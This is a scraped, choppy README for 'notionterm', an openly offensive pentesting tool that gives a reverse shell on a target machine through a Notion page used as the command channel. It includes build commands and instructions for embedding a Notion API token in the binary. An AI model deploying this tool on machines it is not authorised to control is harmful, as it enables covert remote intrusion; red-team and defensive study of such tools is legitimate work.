The focus was on making something fun while still being usable, but that’s not meant to be THE solution for reverse shell in the pentester’s arsenal
Just use notion as usual and launch
notionterm on target.
roughly inspired by the great idea of OffensiveNotion and notionion!
notiontermand transfer it on target machine (see install)
There are 3 main ways to run
Get terminal, stop/unstop it, etc…
Start the shell with the button widget: turn
ON, do you reverse shell stuff, turn
OFF to pause, turn
ON to resume etc… “server” mode
Ease notionterm embedding in any page
notionterm --server [flags]
Start a shell session in any page by creating an embed block with URL containing the page id (
CTRL+Lto get it):
Only perform HTTP traffic from target → notion
notionterm light [flags]
notionterm is aimed to be run on target machine it must be built to fit with it.
Thus set env var to fit with the target requirement:
git clone https://github.com/ariary/notionterm.git && cd notionterm GOOS=$GOOS go build notionterm.go
You will need to set API key and notion page URL using either env var (
NOTION_PAGE_URL) or flags (
Embed directly the notion integration API token and notion page url in the binary. ⚠️ everybody with access to the binary can retrieved the token. For security reason don’t share it and remove it after use.
Set according env var:
export NOTION_PAGE_URL=[NOTION_PAGE_URL] export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
And build it:
git clone https://github.com/ariary/notionterm.git && cd notionterm ./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go